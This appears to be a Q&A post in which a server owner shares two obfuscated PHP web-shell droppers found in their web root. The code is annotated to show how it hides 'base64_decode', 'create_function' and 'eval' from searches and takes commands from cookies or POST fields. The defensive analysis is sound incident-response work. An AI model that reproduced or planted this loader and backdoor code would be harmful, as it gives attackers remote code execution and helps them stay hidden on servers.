
Every so often I check our server and find files I did not put there sitting in the domain's root (web root) directory. Their contents are obfuscated, and they carry innocuous-looking names such as:

css2.php              db_model.php          .htaccess             menu57.php            rss_feeder.class.php  stats21.php           title.php   

Below are the contents of one of them, db_model.php (the long base64 string is cut off in this listing); the other PHP files look similar. Note that an `.htaccess` was dropped alongside them — an attacker-written `.htaccess` can change how the web server treats the directory (which extensions are executed as PHP, access rules, error handling), so it needs to be inspected and removed together with the PHP files.

<?php

// db_model.php — stage-1 loader for a PHP web shell. Nothing here is a
// "database model"; the file name is camouflage. Every revealing identifier
// (base64_decode, create_function) is assembled at runtime, so a grep of the
// web root for those names, or for "eval(", finds nothing.
$alphabet = ".hyib/;dq4ux9*zjmclp3_r80)t(vakng1s2foe75w6";
// Base64-encoded PHP payload (cut off in this listing). The visible prefix
// decodes to `global $auth_pass,$color,$default_action,$default_use_ajax,
// $default_charset,$sort; global $cwd,$os,$safe_mode, $in; $auth_pass = '...`,
// i.e. the header of a password-gated web shell; those variable names match
// the WSO ("web shell by oRb") family — confirm by base64-decoding the full
// string on an offline machine, never by executing the file.
$string = "Z2xvYmFsICRhdXRoX3Bhc3MsJGNvbG9yLCRkZWZhdWx0X2FjdGlvbiwkZGVmYXVsdF91c2VfYWpheCwkZGVmYXVsdF9jaGFyc2V0LCRzb3J0Ow0KZ2xvYmFsICRjd2QsJG9zLCRzYWZlX21vZGUsICRpbjsNCg0KJGF1dGhfcGFzcyA9ICdmMzI0MmRjYzU5$
$array_name = "";
// The index list spells a function name out of $alphabet:
//   4,29,34,38,42,9,21,7,38,17,37,7,38 -> b,a,s,e,6,4,_,d,e,c,o,d,e
// so $array_name ends up as "base64_decode".
$ar = array(4,29,34,38,42,9,21,7,38,17,37,7,38);
foreach($ar as $t){
   $array_name .= $alphabet[$t];
}
// strrev("noitcnuf_etaerc") === "create_function" (deprecated in PHP 7.2,
// removed in PHP 8.0). With an attacker-controlled body it is equivalent to eval().
$a = strrev("noi"."tcnuf"."_eta"."erc");
// create_function("", base64_decode($string)): compiles the decoded shell into
// an anonymous function without the plaintext ever being written to disk.
$f = $a("", $array_name($string));
// Runs it. A plain HTTP request for db_model.php presumably serves the shell,
// so this one file gives the attacker remote code execution as the web-server user.
$f();

From another file, title.php (long lines are cut off in this listing, so the character table and several statements are incomplete):

<?php ${"\x47\x4c\x4fB\x41\x4c\x53"}['ae767'] = "\x3e\x44\x36\x6d\xd\x73\x34\x49\x7b\x4c\x7a\x52\x5a\x5d\x2a\x74\x3f\x72\x6c\x50\x4f\x5e\x6f\x6a\x65\x68\x4a\x37\x3d\x48\x23\x9\x69\x4b\x55\x61\x42\x7d\x32$
// The hex escapes above spell "GLOBALS", so this line fills $GLOBALS['ae767']
// with a character lookup table (cut off in this listing after index 38).
// Every variable and function name below is spelled as a concatenation of
// $GLOBALS['ae767'][n], so neither the names nor strings such as "eval"
// appear literally in the file. From the visible part of the table:
//   0 '>', 1 'D', 2 '6', 3 'm', 4 "\r", 5 's', 6 '4', 7 'I', 8 '{', 9 'L',
//   10 'z', 15 't', 17 'r', 18 'l', 22 'o', 24 'e', 25 'h', 27 '7', 32 'i',
//   35 'a', 38 '2'.  Indices above 38 are not recoverable from this listing.
//
// Each line below is $GLOBALS[<obfuscated alias>] = "<function name>"; the
// alias is later invoked as a variable function, $GLOBALS[$alias](...).
//
// Value "?hr" (index 91 not visible); wrapped around an ord()-style call in
// z629f() -> presumably chr().
$GLOBALS[$GLOBALS['ae767'][56].$GLOBALS['ae767'][92].$GLOBALS['ae767'][2].$GLOBALS['ae767'][75]] = $GLOBALS['ae767'][91].$GLOBALS['ae767'][25].$GLOBALS['ae767'][17];
// Value starts with 'o' (index 22); used as the inner call in z629f() ->
// presumably ord().
$GLOBALS[$GLOBALS['ae767'][5].$GLOBALS['ae767'][56].$GLOBALS['ae767'][56].$GLOBALS['ae767'][38].$GLOBALS['ae767'][82].$GLOBALS['ae767'][42].$GLOBALS['ae767'][24]] = $GLOBALS['ae767'][22].$GLOBALS['ae767'$
// Value starts "strl" (indices 5,15,17,18) and is the length function in
// z629f()'s loop bounds -> strlen().
$GLOBALS[$GLOBALS['ae767'][18].$GLOBALS['ae767'][82].$GLOBALS['ae767'][92].$GLOBALS['ae767'][42]] = $GLOBALS['ae767'][5].$GLOBALS['ae767'][15].$GLOBALS['ae767'][17].$GLOBALS['ae767'][18].$GLOBALS['ae767'$
// Value cut off. Called three times with string arguments in the @-suppressed
// block below; in this kind of shell those are typically ini_set()-style calls
// that silence error logging — confirm from the full file.
$GLOBALS[$GLOBALS['ae767'][41].$GLOBALS['ae767'][66].$GLOBALS['ae767'][43].$GLOBALS['ae767'][71].$GLOBALS['ae767'][2].$GLOBALS['ae767'][92].$GLOBALS['ae767'][43].$GLOBALS['ae767'][83]] = $GLOBALS['ae767'$
// Value cut off; used at the end of the script to turn the reply array into
// the HTTP response body (presumably serialize() or similar).
$GLOBALS[$GLOBALS['ae767'][49].$GLOBALS['ae767'][27].$GLOBALS['ae767'][2].$GLOBALS['ae767'][75].$GLOBALS['ae767'][42].$GLOBALS['ae767'][27].$GLOBALS['ae767'][35].$GLOBALS['ae767'][75]] = $GLOBALS['ae767'$
// Value starts with table index 58, the same character that starts the reply
// key it is stored under — consistent with 'pv' => phpversion(); unverified.
$GLOBALS[$GLOBALS['ae767'][5].$GLOBALS['ae767'][92].$GLOBALS['ae767'][42].$GLOBALS['ae767'][43].$GLOBALS['ae767'][27].$GLOBALS['ae767'][6].$GLOBALS['ae767'][82]] = $GLOBALS['ae767'][58].$GLOBALS['ae767']$
// Value starts "??se" (indices 62,41 not visible, then 's','e'). It is applied
// to the decoded request payload, whose result is then indexed as an array ->
// presumably unserialize(), i.e. attacker-supplied bytes are deserialized.
$GLOBALS[$GLOBALS['ae767'][41].$GLOBALS['ae767'][66].$GLOBALS['ae767'][2].$GLOBALS['ae767'][82]] = $GLOBALS['ae767'][62].$GLOBALS['ae767'][41].$GLOBALS['ae767'][5].$GLOBALS['ae767'][24].$GLOBALS['ae767']$
// Value cut off; this alias is not referenced in the visible lines.
$GLOBALS[$GLOBALS['ae767'][49].$GLOBALS['ae767'][6].$GLOBALS['ae767'][92].$GLOBALS['ae767'][92].$GLOBALS['ae767'][82].$GLOBALS['ae767'][82].$GLOBALS['ae767'][2].$GLOBALS['ae767'][56]] = $GLOBALS['ae767']$
// Value starts "se" (indices 5,24) and is called with (0) below -> presumably
// set_time_limit(0).
$GLOBALS[$GLOBALS['ae767'][81].$GLOBALS['ae767'][27].$GLOBALS['ae767'][56].$GLOBALS['ae767'][2].$GLOBALS['ae767'][6].$GLOBALS['ae767'][2]] = $GLOBALS['ae767'][5].$GLOBALS['ae767'][24].$GLOBALS['ae767'][1$
// Value cut off; this is the decode step applied to the raw cookie/POST value
// before deserialization (base64_decode, the XOR routine, or a wrapper of it —
// cannot be read from this listing).
$GLOBALS[$GLOBALS['ae767'][18].$GLOBALS['ae767'][91].$GLOBALS['ae767'][91].$GLOBALS['ae767'][66].$GLOBALS['ae767'][56].$GLOBALS['ae767'][35].$GLOBALS['ae767'][92].$GLOBALS['ae767'][83]] = $GLOBALS['ae767$
// Value starts with 'z' (index 10); called from a774bfe() below — plausibly the
// z629f() cipher routine itself.
$GLOBALS[$GLOBALS['ae767'][24].$GLOBALS['ae767'][82].$GLOBALS['ae767'][92].$GLOBALS['ae767'][71].$GLOBALS['ae767'][2].$GLOBALS['ae767'][43].$GLOBALS['ae767'][27]] = $GLOBALS['ae767'][10].$GLOBALS['ae767'$
// Aliases for the request superglobals: commands arrive in POST fields or
// cookies (cookies are tried first, see the dispatcher below).
$GLOBALS[$GLOBALS['ae767'][48].$GLOBALS['ae767'][42].$GLOBALS['ae767'][42].$GLOBALS['ae767'][27].$GLOBALS['ae767'][66]] = $_POST;
$GLOBALS[$GLOBALS['ae767'][18].$GLOBALS['ae767'][82].$GLOBALS['ae767'][71].$GLOBALS['ae767'][43].$GLOBALS['ae767'][27].$GLOBALS['ae767'][82].$GLOBALS['ae767'][91]] = $_COOKIE;
// Three @-suppressed calls of the alias whose value is cut off above
// (arguments also cut off). The suppression is itself part of the stealth:
// nothing here is allowed to raise a warning into the error log.
@$GLOBALS[$GLOBALS['ae767'][41].$GLOBALS['ae767'][66].$GLOBALS['ae767'][43].$GLOBALS['ae767'][71].$GLOBALS['ae767'][2].$GLOBALS['ae767'][92].$GLOBALS['ae767'][43].$GLOBALS['ae767'][83]]($GLOBALS['ae767']$
@$GLOBALS[$GLOBALS['ae767'][41].$GLOBALS['ae767'][66].$GLOBALS['ae767'][43].$GLOBALS['ae767'][71].$GLOBALS['ae767'][2].$GLOBALS['ae767'][92].$GLOBALS['ae767'][43].$GLOBALS['ae767'][83]]($GLOBALS['ae767']$
@$GLOBALS[$GLOBALS['ae767'][41].$GLOBALS['ae767'][66].$GLOBALS['ae767'][43].$GLOBALS['ae767'][71].$GLOBALS['ae767'][2].$GLOBALS['ae767'][92].$GLOBALS['ae767'][43].$GLOBALS['ae767'][83]]($GLOBALS['ae767']$
// The "se…" alias called with 0 -> presumably set_time_limit(0), so a long
// running command is not killed by max_execution_time.
@$GLOBALS[$GLOBALS['ae767'][81].$GLOBALS['ae767'][27].$GLOBALS['ae767'][56].$GLOBALS['ae767'][2].$GLOBALS['ae767'][6].$GLOBALS['ae767'][2]](0);

// $z0503b8: raw request payload (cookie or POST value); $afb153: the name of
// the cookie/field it came from. Both are filled by the dispatcher further down.
$z0503b8 = NULL;
$afb153 = NULL;

// Assigns a global whose name, spelled through the table, has 'a','6','7' at
// positions 3,5,6 (indices 35,2,27) — consistent with $k5ac67, which the next
// line imports and which the dispatcher compares against a field of the decoded
// payload. That makes this the shell's access key, hard-coded in the file
// (value cut off here; it is an indicator worth recording for the incident).
$GLOBALS[$GLOBALS['ae767'][81].$GLOBALS['ae767'][92].$GLOBALS['ae767'][35].$GLOBALS['ae767'][91].$GLOBALS['ae767'][2].$GLOBALS['ae767'][27]] = $GLOBALS['ae767'][75].$GLOBALS['ae767'][35].$GLOBALS['ae767'$
// No effect at file scope; kept by the author out of habit or as noise.
global $k5ac67;

/**
 * Byte-wise transform of $z0503b8 under the key $mf97830 — the shell's
 * "cipher". The aliases in the loop bounds resolve to strlen(), and the body
 * appears to append chr(ord(...) ...): the inner loop walks the key while the
 * outer index walks the data, which is the shape of a repeating-key XOR. The
 * exact operator and the index increments sit on the cut-off lines, so treat
 * this as decrypt(data, key) until the full file has been read offline.
 *
 * @param string $z0503b8 input bytes (ciphertext or plaintext)
 * @param string $mf97830 key
 * @return string transformed bytes (presumably one output byte per input byte)
 */
function z629f($z0503b8, $mf97830)
{
    $t7aae05 = "";

    // Outer loop has no increment clause of its own; the data index is
    // presumably advanced in the (cut-off) inner loop header.
    for ($u9ce42=0; $u9ce42<$GLOBALS[$GLOBALS['ae767'][18].$GLOBALS['ae767'][82].$GLOBALS['ae767'][92].$GLOBALS['ae767'][42]]($z0503b8);)
    {
        // Inner loop: one step per key byte, as long as input bytes remain.
        for ($w21eb399=0; $w21eb399<$GLOBALS[$GLOBALS['ae767'][18].$GLOBALS['ae767'][82].$GLOBALS['ae767'][92].$GLOBALS['ae767'][42]]($mf97830) && $u9ce42<$GLOBALS[$GLOBALS['ae767'][18].$GLOBALS['ae767']$
        {
            // chr( ord(...) <op> ... ) — outer alias "?hr", inner alias "o…";
            // the operator is on the cut-off part of the line.
            $t7aae05 .= $GLOBALS[$GLOBALS['ae767'][56].$GLOBALS['ae767'][92].$GLOBALS['ae767'][2].$GLOBALS['ae767'][75]]($GLOBALS[$GLOBALS['ae767'][5].$GLOBALS['ae767'][56].$GLOBALS['ae767'][56].$GLOBALS$
        }
    }

    return $t7aae05;
}

/**
 * Wrapper around the alias whose value starts with 'z' (plausibly z629f()
 * above), with access to the embedded key $k5ac67. The nested call is cut
 * off, so the exact composition (e.g. a second pass keyed by $k5ac67) cannot
 * be read from this listing; it is not visibly called in the lines shown and
 * is presumably the decode step used by the dispatcher.
 *
 * @param string $z0503b8 input bytes
 * @param string $mf97830 key
 * @return string result of the aliased call
 */
function a774bfe($z0503b8, $mf97830)
{
    global $k5ac67;

    return $GLOBALS[$GLOBALS['ae767'][24].$GLOBALS['ae767'][82].$GLOBALS['ae767'][92].$GLOBALS['ae767'][71].$GLOBALS['ae767'][2].$GLOBALS['ae767'][43].$GLOBALS['ae767'][27]]($GLOBALS[$GLOBALS['ae767'][24$
}

// ---- Command dispatcher -------------------------------------------------
// Input selection: walk every cookie and keep the LAST one's value and name.
// Any cookie name is accepted, so the operator can rotate names freely and a
// request looks like an ordinary session cookie in access logs.
foreach ($GLOBALS[$GLOBALS['ae767'][18].$GLOBALS['ae767'][82].$GLOBALS['ae767'][71].$GLOBALS['ae767'][43].$GLOBALS['ae767'][27].$GLOBALS['ae767'][82].$GLOBALS['ae767'][91]] as $mf97830=>$sf8707d0)
{
    $z0503b8 = $sf8707d0;
    $afb153 = $mf97830;
}

// Fallback: no usable cookie value (truthiness test, so "" and "0" both fail)
// -> take the last POST field instead.
if (!$z0503b8)
{
    foreach ($GLOBALS[$GLOBALS['ae767'][48].$GLOBALS['ae767'][42].$GLOBALS['ae767'][42].$GLOBALS['ae767'][27].$GLOBALS['ae767'][66]] as $mf97830=>$sf8707d0)
    {
        $z0503b8 = $sf8707d0;
        $afb153 = $mf97830;
    }
}

// Decode the payload: the "??se…" alias (presumably unserialize) applied to
// the alias whose value was cut off (the decode/decrypt step). Errors are
// @-suppressed. Attacker-controlled bytes are deserialized here, BEFORE the
// key check below, so this line is reachable by anyone who can reach the file.
$z0503b8 = @$GLOBALS[$GLOBALS['ae767'][41].$GLOBALS['ae767'][66].$GLOBALS['ae767'][2].$GLOBALS['ae767'][82]]($GLOBALS[$GLOBALS['ae767'][18].$GLOBALS['ae767'][91].$GLOBALS['ae767'][91].$GLOBALS['ae767'][6$
// Authentication: a field of the decoded array (key 'a' + one unreadable
// character) must match the embedded secret $k5ac67. Loose == comparison.
if (isset($z0503b8[$GLOBALS['ae767'][35].$GLOBALS['ae767'][81]]) && $k5ac67==$z0503b8[$GLOBALS['ae767'][35].$GLOBALS['ae767'][81]])
{
    // Action field 'a' (index 35) == 'i' (index 32): beacon / info reply.
    // Builds a two-entry array — one entry from an @-suppressed call, one
    // hard-coded short string; by the shared table prefix the first is
    // consistent with 'pv' => phpversion() and the second with a version tag
    // (unverified) — and echoes it through the alias presumed to be serialize().
    // Operators use this to check that an implant is still alive.
    if ($z0503b8[$GLOBALS['ae767'][35]] == $GLOBALS['ae767'][32])
    {
        $u9ce42 = Array(
            $GLOBALS['ae767'][58].$GLOBALS['ae767'][40] => @$GLOBALS[$GLOBALS['ae767'][5].$GLOBALS['ae767'][92].$GLOBALS['ae767'][42].$GLOBALS['ae767'][43].$GLOBALS['ae767'][27].$GLOBALS['ae767'][6].$GLO$
            $GLOBALS['ae767'][5].$GLOBALS['ae767'][40] => $GLOBALS['ae767'][75].$GLOBALS['ae767'][85].$GLOBALS['ae767'][42].$GLOBALS['ae767'][60].$GLOBALS['ae767'][75],
        );
        echo @$GLOBALS[$GLOBALS['ae767'][49].$GLOBALS['ae767'][27].$GLOBALS['ae767'][2].$GLOBALS['ae767'][75].$GLOBALS['ae767'][42].$GLOBALS['ae767'][27].$GLOBALS['ae767'][35].$GLOBALS['ae767'][75]]($u9c$
    }
    // Action 'a' == 'e' (index 24): eval() of another field of the payload,
    // i.e. PHP source taken straight from the cookie/POST data. This is full
    // remote code execution as the web-server user; the only gate is knowing
    // $k5ac67, which is stored in this file.
    elseif ($z0503b8[$GLOBALS['ae767'][35]] == $GLOBALS['ae767'][24])
    {
        eval($z0503b8[$GLOBALS['ae767'][56]]);
    }
    // Stop so nothing else is emitted. Nothing further is visible in the
    // listing, so a request without the key presumably just yields an empty page —
    // the file is indistinguishable from a harmless script to a casual browser.
    exit();
}



Clearly we need to harden our Ubuntu installation so this does not happen again — but first: what does this code actually do, and what does its presence tell us about how files are getting onto the server?

kp123
    Depending on how up to date your server is, it's probably more likely that the real issue is a vulnerability in the website you're running, which won't be fixed by hardening the server it's running on. – AndrolGenhald Aug 11 '19 at 02:56
    You seem surprisingly unconcerned about the fact that your server has been hacked multiple times. I would really try to stop that before you get sued for a data breach.... – Conor Mancone Aug 11 '19 at 04:09
    I don't have an application running — no data, no breaches. The code was uploaded into an empty folder, hence the lack of "concern". I am in the process of deploying a new site to this server, so it's important that I fix this problem now, so that it never happens once my site is live. – kp123 Aug 11 '19 at 05:18
